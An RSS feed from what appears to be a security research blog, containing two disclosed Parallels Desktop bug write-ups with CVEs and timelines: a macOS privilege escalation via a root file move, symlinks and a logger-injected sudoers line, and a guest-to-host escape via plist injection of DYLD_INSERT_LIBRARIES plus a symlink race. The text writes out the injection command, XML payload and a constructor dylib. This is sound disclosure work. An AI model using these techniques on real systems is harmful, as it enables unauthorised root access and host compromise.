Jekyll2023-12-31T08:52:10+00:00https://pwn.win/feed.xmlpwn.winA diary of security exploration.Turning a boring file move into a privilege escalation on Mac2023-10-28T00:00:00+00:002023-10-28T00:00:00+00:00https://pwn.win/2023/10/28/file-move-privesc-mac<p>While poking around <a href="https://www.parallels.com/products/desktop/" target="_blank">Parallels Desktop</a> I found a script, invoked by a setuid-root binary, that contains the following snippet:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">local </span><span class="nv">prl_dir</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">usr_home</span><span class="k">}</span><span class="s2">/Library/Parallels"</span>
<span class="k">if</span> <span class="o">[</span> <span class="nt">-e</span> <span class="s2">"</span><span class="nv">$prl_dir</span><span class="s2">"</span> <span class="nt">-a</span> <span class="o">!</span> <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$prl_dir</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
</span>log warning <span class="s2">"'</span><span class="k">${</span><span class="nv">prl_dir</span><span class="k">}</span><span class="s2">' is not a directory. Renaming it."</span>
<span class="nb">mv</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$prl_dir</span><span class="s2">"</span><span class="o">{</span>,~<span class="o">}</span>
<span class="k">continue
fi</span>
</code></pre></div></div>
<p>Here <code class="language-plaintext highlighter-rouge">${usr_home}</code> represents the home directory of the user for which Parallels Desktop is installed. The code says
if <code class="language-plaintext highlighter-rouge">~/Library/Parallels</code> exists and is not a directory then move it to <code class="language-plaintext highlighter-rouge">~/Library/Parallels~</code>, presumably to back it up before creating this path as a directory.</p>
<p>However, given this is our home directory, we (a low privileged user) can create <code class="language-plaintext highlighter-rouge">~/Library/Parallels~</code> beforehand, and make it a symlink to another directory, for example. This would mean the code actually moves <code class="language-plaintext highlighter-rouge">~/Library/Parallels</code> <em>into</em> the directory pointed to by the symlink. Additionally, we fully control the <code class="language-plaintext highlighter-rouge">~/Library/Parallels</code> file: it can have whatever content we want, or it could even be a symlink to some other file.</p>
<p>Great, so now we can move a file of controlled content, or a symlink, into an arbitrary directory. How can we use this to escalate our privileges to root?</p>
<p>Digging around the filesystem, some ways which came to mind:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">/etc/periodic/{daily,monthly,weekly}</code>
<ul>
<li>Files must be owned by root, which our file isn’t</li>
<li>Besides, I don’t want to wait days for this privesc</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">/etc/pam.d/</code>
<ul>
<li>Files must be owned by root, which our file isn’t</li>
<li>Filenames are important, we can’t use the <code class="language-plaintext highlighter-rouge">Parallels</code> filename for this</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">/etc/ssh/sshd_config.d/</code>
<ul>
<li>Could use something like <code class="language-plaintext highlighter-rouge">AuthorizedKeysCommand</code> and <code class="language-plaintext highlighter-rouge">AuthorizedKeysCommandUser</code> to execute a command as root</li>
<li>Would need a reboot or some other way to force sshd to reload its config</li>
<li>sshd would need to be running in the first place, which it’s not by default</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">/etc/sudoers.d/</code>
<ul>
<li>Files must be owned by root, which our file isn’t</li>
<li>Files must not be world writeable</li>
</ul>
</li>
</ul>
<p>Of these, the hurdles which seemed easiest to overcome were those of <code class="language-plaintext highlighter-rouge">/etc/sudoers.d</code>. So I started digging for files which are owned by root, are not world-writeable, and we can partially control. With some searching I found <code class="language-plaintext highlighter-rouge">/var/log/install.log</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">-rw-r--r--</span>@ 1 root admin 637109 23 Jun 12:00 /var/log/install.log
</code></pre></div></div>
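<p>The two hurdles listed for <code class="language-plaintext highlighter-rouge">/etc/sudoers.d/</code> can be written down as a small predicate. This is only a sketch of those two conditions as described in this post; <code class="language-plaintext highlighter-rouge">passes_sudoers_dir_checks</code> is a hypothetical name, and the real sudo may well perform further checks that are not modelled here.</p>

```c
#include <sys/stat.h>
#include <sys/types.h>

/* Models only the two conditions listed in the post:
 *   1. the file is owned by root (uid 0)
 *   2. the file is not world-writeable
 * Returns 1 if both hold, 0 otherwise. */
int passes_sudoers_dir_checks(uid_t owner, mode_t mode)
{
    if (owner != 0)
        return 0;
    if (mode & S_IWOTH)
        return 0;
    return 1;
}
```

<p>With the listing above, <code class="language-plaintext highlighter-rouge">/var/log/install.log</code> is owned by root with mode <code class="language-plaintext highlighter-rouge">0644</code>, so <code class="language-plaintext highlighter-rouge">passes_sudoers_dir_checks(0, 0644)</code> returns 1, whereas a file owned by an ordinary user or one with mode <code class="language-plaintext highlighter-rouge">0666</code> is rejected.</p>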
<p>It turns out we can write to this log using the <code class="language-plaintext highlighter-rouge">logger</code> utility, specifying the <code class="language-plaintext highlighter-rouge">install.error</code> priority. Like so:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>logger <span class="nt">-p</span> install.error <span class="s2">"Hello, World!"</span>
</code></pre></div></div>
<p><img src="/assets/file-move-privesc-mac/install_log1.png" alt="Log file entry" /></p>
<p>Even better, we can get our content onto a new line using a carriage return, which is replaced with a newline, like so:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>logger <span class="nt">-p</span> install.error <span class="si">$(</span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="se">\r</span><span class="s2">Hello, World!"</span><span class="si">)</span>
</code></pre></div></div>
<p><img src="/assets/file-move-privesc-mac/install_log2.png" alt="Log file newline injection" /></p>
<p>We can use this to insert a line of sudo config:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>logger <span class="nt">-p</span> install.error <span class="si">$(</span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="se">\r</span><span class="nv">$USER</span><span class="s2"> ALL=(ALL) NOPASSWD: ALL"</span><span class="si">)</span>
</code></pre></div></div>
<p><img src="/assets/file-move-privesc-mac/install_log3.png" alt="Log file sudo config" /></p>
<p>So now we have a log file with a bunch of invalid sudo config lines (i.e. normal log entries), with one line of valid sudo config, which says that our current user can use sudo with no password, allowing us to escalate our privileges.</p>
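<p>Why the carriage return matters can be illustrated with a toy line scanner. This is a rough sketch under stated assumptions: <code class="language-plaintext highlighter-rouge">cr_to_newline</code> models the carriage-return-to-newline replacement observed above, and <code class="language-plaintext highlighter-rouge">contains_rule_line</code> is a hypothetical exact-match scanner, not sudo's parser. The user name <code class="language-plaintext highlighter-rouge">alice</code> and the log prefix are made up.</p>

```c
#include <stddef.h>
#include <string.h>

/* Replace every carriage return with a newline, in place. This models the
 * replacement the post observed in the install log; it is an assumption
 * about the effect, not a copy of the logging daemon's code. */
void cr_to_newline(char *s)
{
    for (; *s; s++) {
        if (*s == '\r')
            *s = '\n';
    }
}

/* Toy scanner (not sudo's parser): returns 1 if some complete line of
 * text is exactly equal to rule, 0 otherwise. */
int contains_rule_line(const char *text, const char *rule)
{
    size_t rule_len = strlen(rule);
    const char *line = text;

    while (*line) {
        const char *end = strchr(line, '\n');
        size_t len = end ? (size_t)(end - line) : strlen(line);

        if (len == rule_len && strncmp(line, rule, len) == 0)
            return 1;
        if (end == NULL)
            break;
        line = end + 1;
    }
    return 0;
}
```

<p>Without the replacement, the injected text shares a line with the log prefix and never stands alone. After it, the rule occupies a line of its own, which is what lets a line-oriented parser treat it as valid config.</p>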
<p>Now we can make <code class="language-plaintext highlighter-rouge">~/Library/Parallels</code> a symlink pointing to <code class="language-plaintext highlighter-rouge">/var/log/install.log</code> and <code class="language-plaintext highlighter-rouge">~/Library/Parallels~</code> a symlink pointing to <code class="language-plaintext highlighter-rouge">/etc/sudoers.d/</code>. When we invoke the vulnerable script, which runs as root, it will move our symlink, pointing to the log file, into <code class="language-plaintext highlighter-rouge">/etc/sudoers.d/</code>.</p>
<p>After that we can run <code class="language-plaintext highlighter-rouge">sudo su</code>, which will follow the symlink, parse the log file, spitting out pages of errors about the invalid syntax of the log entries in the process (but kindly continuing processing) until it reaches a line of valid syntax which we’ve injected, and eventually we’ll be dropped into a root shell.</p>
<p>Hopefully other people find this trick useful, beyond just Parallels. You can find the code for this exploit <a href="https://github.com/kn32/parallels-file-move-privesc" target="_blank">on my GitHub</a>.</p>
<video width="100%" controls="" autoplay="" playsinline="" loop="">
<source src="/assets/file-move-privesc-mac/file_move_poc.mp4" type="video/mp4" />
</video>
<h2 id="timeline">Timeline</h2>
<ul>
<li><strong>2023-05-19</strong> - ZDI submission, assigned ZDI-CAN-21227</li>
<li><strong>2023-06-21</strong> - reported to vendor</li>
<li><strong>2023-07-06</strong> - fix released in version 18.3.2</li>
<li><strong>2023-12-19</strong> - public release of advisory, CVE-2023-50226</li>
</ul>Escaping Parallels Desktop with Plist Injection2023-05-08T00:00:00+00:002023-05-08T00:00:00+00:00https://pwn.win/2023/05/08/parallels-escape<p>This post details two bugs I found, a plist injection (CVE-2023-27328) and a race condition (CVE-2023-27327), which could be used to escape from a guest Parallels Desktop virtual machine. In this post I’ll break down the findings.</p>
<p>For anyone not familiar, <a href="https://www.parallels.com/products/desktop/" target="_blank">Parallels Desktop</a> offers virtualization on macOS. It allows you to run virtual machines, like Windows or Linux, on a macOS host.</p>
<h2 id="toolgate--parallels-tools">Toolgate &amp; Parallels Tools</h2>
<p>Toolgate is the protocol used for communication between the guest and host in Parallels, and it’s a great place to start looking for bugs due to its large attack surface and relatively immature security posture.</p>
<p>On x86 guests (which I’ll be using as an example for this blog post) Toolgate requests are sent to the host from the guest by writing the physical address of a <code class="language-plaintext highlighter-rouge">TG_REQUEST</code> struct to a specific I/O port.</p>
<p>A request structure consists of an opcode (<code class="language-plaintext highlighter-rouge">Request</code>), a status field (<code class="language-plaintext highlighter-rouge">Status</code>) which is updated by the host to indicate the status of a request, optional inline data (if <code class="language-plaintext highlighter-rouge">InlineByteCount</code> > 0), and an optional list of <code class="language-plaintext highlighter-rouge">TG_BUFFER</code> structs (if <code class="language-plaintext highlighter-rouge">BufferCount</code> > 0).</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="n">_TG_REQUEST</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="n">Request</span><span class="p">;</span> <span class="c1">// opcode</span>
<span class="kt">unsigned</span> <span class="n">Status</span><span class="p">;</span> <span class="c1">// request status</span>
<span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">InlineByteCount</span><span class="p">;</span> <span class="c1">// number of inline bytes</span>
<span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">BufferCount</span><span class="p">;</span> <span class="c1">// number of buffers</span>
<span class="kt">unsigned</span> <span class="n">Reserved</span><span class="p">;</span> <span class="c1">// reserved</span>
<span class="cm">/* [ inline bytes ] */</span>
<span class="cm">/* [ TG_BUFFERs ] */</span>
<span class="p">}</span> <span class="n">TG_REQUEST</span><span class="p">;</span>
</code></pre></div></div>
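<p>To make the header layout concrete, here is a sketch that mirrors the struct with fixed-width types. It assumes <code class="language-plaintext highlighter-rouge">unsigned</code> is 32 bits and <code class="language-plaintext highlighter-rouge">unsigned short</code> is 16 bits, as on typical x86 ABIs. <code class="language-plaintext highlighter-rouge">TG_REQUEST_HDR</code> and <code class="language-plaintext highlighter-rouge">tg_make_header</code> are hypothetical names, and zeroing <code class="language-plaintext highlighter-rouge">Status</code> and <code class="language-plaintext highlighter-rouge">Reserved</code> is an assumption rather than documented behaviour.</p>

```c
#include <stdint.h>
#include <string.h>

/* Fixed-width mirror of the TG_REQUEST header shown above.
 * Assumption: unsigned is 32 bits and unsigned short is 16 bits. */
typedef struct {
    uint32_t Request;          /* opcode */
    uint32_t Status;           /* request status, updated by the host */
    uint16_t InlineByteCount;  /* number of inline bytes */
    uint16_t BufferCount;      /* number of buffers */
    uint32_t Reserved;         /* reserved */
} TG_REQUEST_HDR;

/* Under those assumptions the header is 16 bytes with no padding. */
_Static_assert(sizeof(TG_REQUEST_HDR) == 16, "unexpected header size");

/* Hypothetical helper: build a header for the given opcode and counts.
 * Status and Reserved are zeroed, which is an assumption. */
TG_REQUEST_HDR tg_make_header(uint32_t opcode, uint16_t inline_bytes,
                              uint16_t buffers)
{
    TG_REQUEST_HDR h;

    memset(&h, 0, sizeof(h));
    h.Request = opcode;
    h.InlineByteCount = inline_bytes;
    h.BufferCount = buffers;
    return h;
}
```

<p>The inline bytes and the <code class="language-plaintext highlighter-rouge">TG_BUFFER</code> list would follow this header in memory. Their exact layout is not shown in this post, so the sketch stops at the header.</p>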
<p>Parallels Tools is software which can be installed in a guest (similar to VirtualBox Guest Additions, or VMware Tools) which adds various useful features, such as shared folders, shared clipboard, and drag-and-drop in/out of the VM.</p>
<p>Parallels Tools also adds a channel for userland processes to make Toolgate requests. On Linux this is a proc entry created at <code class="language-plaintext highlighter-rouge">/proc/driver/prl_tg</code>, which is created and managed by the <code class="language-plaintext highlighter-rouge">prl_tg</code> kernel module, and on Windows this is a named pipe at <code class="language-plaintext highlighter-rouge">\\.\pipe\parallels_tools_pipe</code>. Parallels Tools also contains various userland processes and services which use this channel to facilitate these useful features.</p>
<p>Importantly there is a restriction on what Toolgate messages userland processes can send to the host using the channel created by Parallels Tools, which is enforced by the <code class="language-plaintext highlighter-rouge">prl_tg</code> kernel module. Specifically, the opcode (aka the <code class="language-plaintext highlighter-rouge">Request</code> field) must be greater than the value of <code class="language-plaintext highlighter-rouge">TG_REQUEST_SECURED_MAX</code>, which is defined as <code class="language-plaintext highlighter-rouge">0x7fff</code>, otherwise the write to the proc entry will fail with <code class="language-plaintext highlighter-rouge">EINVAL</code>. We can see the code for this here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="cm">/* read request header from userspace */</span>
<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">ureq</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">TG_REQUEST</span><span class="p">)))</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
<span class="cm">/*
* requests up to TG_REQUEST_SECURED_MAX are for drivers only and are
* denied by guest driver if come from user space to maintain guest
* kernel integrity (prevent malicious code from sending FS requests)
* dynamically assigned requests start from TG_REQUEST_MIN_DYNAMIC
*/</span>
<span class="k">if</span> <span class="p">(</span><span class="n">src</span><span class="o">-></span><span class="n">Request</span> <span class="o"><=</span> <span class="n">TG_REQUEST_SECURED_MAX</span><span class="p">)</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
</code></pre></div></div>
<p>As suggested by the comment, the only Toolgate opcodes at or below this threshold are those which handle filesystem operations. This means that if we want to send filesystem-related Toolgate requests, we have to bypass this check. More on this later.</p>
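<p>The effect of that check can be isolated into a small userspace function. This is a sketch rather than the kernel module's code: <code class="language-plaintext highlighter-rouge">tg_check_user_opcode</code> is a hypothetical name, and only the comparison and the <code class="language-plaintext highlighter-rouge">0x7fff</code> threshold come from the snippet above.</p>

```c
#include <errno.h>

#define TG_REQUEST_SECURED_MAX 0x7fff

/* Hypothetical userspace restatement of the prl_tg check: opcodes at or
 * below TG_REQUEST_SECURED_MAX are refused with -EINVAL, anything above
 * is let through (returns 0). */
int tg_check_user_opcode(unsigned request)
{
    if (request <= TG_REQUEST_SECURED_MAX)
        return -EINVAL;
    return 0;
}
```

<p>Two opcodes that appear elsewhere in this post show both outcomes: <code class="language-plaintext highlighter-rouge">0x223</code> (a filesystem open) is refused, while <code class="language-plaintext highlighter-rouge">0x8302</code> (<code class="language-plaintext highlighter-rouge">TG_REQUEST_FAVRUNAPPS</code>) passes.</p>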
<h2 id="shared-applications">Shared Applications</h2>
<p>Shared Applications is a Parallels feature which allows opening files on a Mac in a guest application, and vice versa. It also allows associating file extensions and URL schemes with guest applications. You can read more about this in the <a href="https://download.parallels.com/desktop/v18/docs/en_US/Parallels%20Desktop%20User's%20Guide/33332.htm">documentation</a>.</p>
<p>This feature includes the display of an application’s icon in the Mac dock when it’s launched within a guest. Here’s an example of what it looks like when Microsoft Edge is opened in a Windows guest. We can see that the Edge icon shows up in the dock:
<img src="/assets/parallels-plist-escape/sga_mac_dock.gif" alt="animation showing Edge appearing in Mac dock when started in a VM" /></p>
<p>Parallels handles the “syncing” of running guest apps to the host by monitoring for new applications launched in the guest, and then sending Toolgate requests to the host when a new application has started. The host handles these messages by creating and starting “helper” apps, which have the same name and icon as the app in the guest. These helper apps are then displayed in the Mac dock when they are running, and can be used to launch the respective application in the guest from the dock or Launchpad when they are not running.</p>
<p>This syncing process effectively works like this:</p>
<ol>
<li>Parallels Tools detects an application is launched in the guest</li>
<li>It sends a Toolgate request (<code class="language-plaintext highlighter-rouge">TG_REQUEST_FAVRUNAPPS</code>, opcode <code class="language-plaintext highlighter-rouge">0x8302</code>) to the host notifying it that an application has launched with a given name and icon</li>
<li>If a helper app already exists for this guest app, then that helper app is launched and we’re done</li>
<li>If the helper app doesn’t exist, a new app bundle is created in <code class="language-plaintext highlighter-rouge">~/Applications (Parallels)/&lt;vm_uuid&gt; Applications.localized/</code></li>
<li>The app bundle is created from a template, which is filled in using information supplied by the guest. The information sent from the guest, as part of the Toolgate request, includes the app name, description and icon, amongst other things. This information is written into several files in the new app bundle, including the <a href="https://developer.apple.com/documentation/bundleresources/information_property_list">Info.plist</a>, which is the (XML) file in an app bundle which includes metadata about the bundle</li>
<li>The new helper app is launched, so it shows up in the dock</li>
</ol>
<p>The helper app contains a binary called <code class="language-plaintext highlighter-rouge">WinAppHelper</code>, which is copied directly from the template and exists as the entry point for the app bundle. When the app is run this binary will parse the Parallels-specific configuration files in the app bundle (e.g. <code class="language-plaintext highlighter-rouge">AppParams.pva</code>) and send a message to the corresponding guest VM to start the relevant application, if it’s not already running.</p>
<p>Here you can see a snippet of the Info.plist template, which is taken from the hypervisor binary. The highlighted placeholders are replaced with guest supplied input.
<img src="/assets/parallels-plist-escape/plist_template.png" alt="Plist template" /></p>
<p>Given that the host is taking input from the guest and using it to fill an Info.plist template, it is important that all input from the guest is appropriately escaped or sanitized, so it is not possible to inject XML into the plist and modify the behaviour of the helper app. I found that the escaping <em>was</em> done for all of the fields provided by the guest apart from two: the URL schemes and the file extensions, which register the URL schemes and file extensions that the guest app will handle.</p>
<p>This means we could send our own Toolgate request (opcode <code class="language-plaintext highlighter-rouge">0x8302</code>), to tell the host to create a helper app, with a malicious URL scheme or file extension. In my case I chose to exploit the URL schemes, which were written unescaped into the <code class="language-plaintext highlighter-rouge">CFBundleURLSchemes</code> array, in Info.plist.</p>
<p>The relevant template for creating the <code class="language-plaintext highlighter-rouge">CFBundleURLSchemes</code> array looks like this:</p>
<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt"><key></span>CFBundleURLTypes<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><dict></span>
<span class="nt"><key></span>CFBundleURLName<span class="nt"></key></span>
<span class="nt"><string></span>Supported protocols<span class="nt"></string></span>
<span class="nt"><key></span>CFBundleURLSchemes<span class="nt"></key></span>
<span class="nt"><array></span>
%1
<span class="nt"></array></span>
<span class="nt"></dict></span>
<span class="nt"></array></span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">%1</code> is replaced with the guest-provided URL schemes, each wrapped in <code class="language-plaintext highlighter-rouge">&lt;string&gt;&lt;/string&gt;</code> tags. The completed template is then inserted into the Info.plist template later on.</p>
<p>This is what it looks like in code form:
<img src="/assets/parallels-plist-escape/url_schemes_template.png" alt="URL scheme template" /></p>
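<p>The difference between wrapping a scheme as-is and wrapping it after XML escaping can be sketched as follows. This is an illustration, not the hypervisor's code: <code class="language-plaintext highlighter-rouge">xml_escape</code> and <code class="language-plaintext highlighter-rouge">wrap_scheme</code> are hypothetical helpers, and the 1024-byte scratch buffer is an arbitrary choice for the example.</p>

```c
#include <stdio.h>
#include <string.h>

/* Escape the five XML metacharacters of in into out.
 * Returns 0 on success, -1 if out is too small. */
int xml_escape(const char *in, char *out, size_t out_size)
{
    size_t used = 0;

    if (out_size == 0)
        return -1;
    for (; *in; in++) {
        char single[2] = { *in, '\0' };
        const char *rep;
        size_t n;

        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&apos;"; break;
        default:   rep = single;   break;
        }
        n = strlen(rep);
        if (used + n + 1 > out_size)
            return -1;
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return 0;
}

/* Wrap one URL scheme in <string> tags. With escape == 0 the scheme is
 * inserted verbatim, which reproduces the vulnerable behaviour; with
 * escape != 0 it is XML-escaped first.
 * Returns 0 on success, -1 on truncation. */
int wrap_scheme(const char *scheme, int escape, char *out, size_t out_size)
{
    char escaped[1024];
    const char *body = scheme;
    int n;

    if (escape) {
        if (xml_escape(scheme, escaped, sizeof(escaped)) != 0)
            return -1;
        body = escaped;
    }
    n = snprintf(out, out_size, "<string>%s</string>", body);
    return (n < 0 || (size_t)n >= out_size) ? -1 : 0;
}
```

<p>With <code class="language-plaintext highlighter-rouge">escape</code> set to 0, a scheme containing a closing tag terminates the surrounding <code class="language-plaintext highlighter-rouge">&lt;string&gt;</code> element early. With escaping enabled, the same input stays inert text inside the element.</p>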
<p>One way this can be abused is by using the <a href="https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/20001431-106825">LSEnvironment</a> key to set the <code class="language-plaintext highlighter-rouge">DYLD_INSERT_LIBRARIES</code> environment variable. This can be used to force the helper binary (WinAppHelper) to load an arbitrary dylib when executed. I did spend a while looking for other features of an Info.plist which I could exploit without requiring a second bug, but I wasn’t able to find anything better. I’d be very keen to hear any alternative ideas for exploitation.</p>
<p>For example, if we provide the following string as a URL scheme:</p>
<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code> evil<span class="nt"></string></span>
<span class="nt"></array></span>
<span class="nt"></dict></span>
<span class="nt"></array></span>
<span class="nt"><key></span>LSEnvironment<span class="nt"></key></span>
<span class="nt"><dict></span>
<span class="nt"><key></span>DYLD_INSERT_LIBRARIES<span class="nt"></key></span>
<span class="nt"><string></span>/path/to/malicious.dylib<span class="nt"></string></span>
<span class="nt"></dict></span>
<span class="nt"><key></span>blabla<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><dict></span>
<span class="nt"><key></key></span>
<span class="nt"><array></span>
<span class="nt"><string></span>
</code></pre></div></div>
<p>This gets wrapped in <code class="language-plaintext highlighter-rouge">&lt;string&gt;</code> tags and inserted into the template, resulting in something like this:</p>
<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt"><key></span>CFBundleURLTypes<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><dict></span>
<span class="nt"><key></span>CFBundleURLName<span class="nt"></key></span>
<span class="nt"><string></span>Supported protocols<span class="nt"></string></span>
<span class="nt"><key></span>CFBundleURLSchemes<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><string></span>evil<span class="nt"></string></span>
<span class="nt"></array></span>
<span class="nt"></dict></span>
<span class="nt"></array></span>
<span class="nt"><key></span>LSEnvironment<span class="nt"></key></span>
<span class="nt"><dict></span>
<span class="nt"><key></span>DYLD_INSERT_LIBRARIES<span class="nt"></key></span>
<span class="nt"><string></span>/path/to/malicious.dylib<span class="nt"></string></span>
<span class="nt"></dict></span>
<span class="nt"><key></span>blabla<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><dict></span>
<span class="nt"><key></key></span>
<span class="nt"><array></span>
<span class="nt"><string></string></span>
<span class="nt"></array></span>
<span class="nt"></dict></span>
<span class="nt"></array></span>
</code></pre></div></div>
<p>Now when WinAppHelper is executed it will load a dylib of our choice. If we can make use of an existing dylib which does something interesting, or create our own dylib on disk somewhere, then we can use this to get code execution on the host.</p>
<h2 id="getting-a-file-write">Getting a File Write</h2>
<p>To complete the goal of code execution on the host with no user interaction, I needed to find a way to write a controlled dylib to a known location on the host. Unfortunately there were no files in the helper app bundle which I controlled in their entirety (including e.g. the app icon). Shared folders seemed like a good place to look for bugs which could allow us to do this.</p>
<p>Shared folders in Parallels are actually implemented using Toolgate, which has opcodes for all aspects of file management, including opening, reading and writing files. The shared folder filesystem kernel module (<code class="language-plaintext highlighter-rouge">prl_fs</code>) sends the relevant Toolgate requests to the host when filesystem operations occur in the guest, and the host then performs the requested operation.</p>
<p>As mentioned earlier, all of these opcodes are forbidden by the communication channel created by Parallels Tools, so to send filesystem-related opcodes we need to load our own kernel module, which unfortunately requires root permissions. To do this I took the existing <code class="language-plaintext highlighter-rouge">prl_tg</code> code and modified it to remove the security checks.</p>
<p>Once we can write arbitrary messages to Toolgate, we can open files in a shared folder using the <code class="language-plaintext highlighter-rouge">TG_REQUEST_FS_L_OPEN</code> (<code class="language-plaintext highlighter-rouge">0x223</code>) opcode. In the hypervisor, file paths are constructed by appending the file path provided by the guest to the configured shared folder path on the host. There are some security checks when handling an open request to make sure the guest can’t open files outside of the host shared folder path, including:</p>
<ul>
<li>Checking if the file path contains <code class="language-plaintext highlighter-rouge">..</code>, which should have already been canonicalized by the guest</li>
<li>Checking if the file is a symlink which points outside of the share</li>
<li>Opening the constructed path and checking if the resulting file is outside of the shared folder on the host, which is done using the <code class="language-plaintext highlighter-rouge">F_GETPATH</code> option of <code class="language-plaintext highlighter-rouge">fcntl</code>.</li>
</ul>
<p>If any of these checks fail then Parallels will refuse to open the file and will return an error to the guest. The checks themselves look good, but the issue was a time-of-check to time-of-use (TOCTOU) opportunity between when the security checks happened and when the file was actually opened. This meant that if we quickly switched the path from a normal file to a symlink pointing to a path outside of the share on the host, after the security checks, but before the open, then the hypervisor would open the target of the symlink on the host for us. After that we could simply read from or write to the opened file using subsequent calls to Toolgate. In other words, this gives us the ability to read or write any file on the host, assuming the host process has permissions.</p>
<p><img src="/assets/parallels-plist-escape/toctou.gif" alt="animation showing how to exploit the TOCTOU with a symlink" /></p>
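<p>Two of the checks described above can be sketched as pure path predicates. These are hypothetical helpers, not the hypervisor's implementation: <code class="language-plaintext highlighter-rouge">has_dotdot_component</code> and <code class="language-plaintext highlighter-rouge">path_within_share</code> are made-up names, and the containment check assumes both paths are absolute and already canonical.</p>

```c
#include <string.h>

/* Returns 1 if any component of path is exactly "..", 0 otherwise. */
int has_dotdot_component(const char *path)
{
    const char *p = path;

    while (*p) {
        const char *start;

        while (*p == '/')
            p++;
        start = p;
        while (*p && *p != '/')
            p++;
        if (p - start == 2 && start[0] == '.' && start[1] == '.')
            return 1;
    }
    return 0;
}

/* Returns 1 if resolved is share_root itself or lies beneath it.
 * Assumes both are absolute, canonical paths and that share_root has no
 * trailing slash. The boundary test stops "/share" from matching
 * "/shared-other". */
int path_within_share(const char *resolved, const char *share_root)
{
    size_t n = strlen(share_root);

    if (strncmp(resolved, share_root, n) != 0)
        return 0;
    return resolved[n] == '\0' || resolved[n] == '/';
}
```

<p>Predicates like these only help if their verdict applies to the same file object that is subsequently read or written. The bug here was not in the checks but in the gap between running them and performing the final open.</p>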
<p>Ok, but why do we need Toolgate requests for this, if the shared folders filesystem does it for us? In theory this bug <em>should</em> be exploitable by just performing the race with files in a shared folder, without sending manual Toolgate requests. However, in practice, trying to exploit this race through only filesystem operations triggers a bug in the <code class="language-plaintext highlighter-rouge">prl_fs</code> kernel module which results in a kernel oops.</p>
<h2 id="combining-the-two">Combining the two</h2>
<p>The first bug allows us to load any dylib on the host, and the second bug gives us the ability to write an arbitrary file anywhere on the host filesystem (assuming the Parallels process has permissions). Therefore we can create a malicious dylib, write it to a known location on the host, and force a helper app to load it, which will give us code execution with no user interaction.</p>
<p>We can use the following code compiled into a dylib, which will pop a calculator when the dylib is loaded.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
</span>
<span class="kt">void</span> <span class="nf">__attribute__</span> <span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="n">pwn</span><span class="p">()</span> <span class="p">{</span>
<span class="n">unsetenv</span><span class="p">(</span><span class="s">"DYLD_INSERT_LIBRARIES"</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="s">"osascript -e 'tell application </span><span class="se">\"</span><span class="s">Calculator.app</span><span class="se">\"</span><span class="s"> to activate'"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<h2 id="exploit-demonstration">Exploit Demonstration</h2>
<video width="100%" controls="" autoplay="" playsinline="" loop="">
<source src="/assets/parallels-plist-escape/full_chain.mp4" type="video/mp4" />
</video>
<h2 id="conclusion">Conclusion</h2>
<p>This chain can be exploited from within any guest operating system by any code with elevated privileges, which are necessary to use the privileged instructions needed to write arbitrary Toolgate requests. If Parallels Tools is installed, then the plist injection bug can be exploited with low privileges, but the file write bug still requires loading our own kernel module to bypass the security restrictions and send our own filesystem-related Toolgate requests.</p>
<p>Overall, Parallels is a fun target. Based on the bugs I and others have found I would say that it’s more immature than the likes of VirtualBox and VMware, and I’m sure there are plenty more bugs to be found here.</p>
<p>You can find the code for these exploits <a href="https://github.com/kn32/parallels-plist-escape" target="_blank">on my GitHub</a>.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>Plist injection
<ul>
<li>Assigned CVE-2023-27328 / <a href="https://www.zerodayinitiative.com/advisories/ZDI-23-220/">ZDI-23-220</a></li>
<li><strong>2022-11-03</strong> - reported to vendor</li>
<li><strong>2022-12-13</strong> - fix released in version 18.1.1</li>
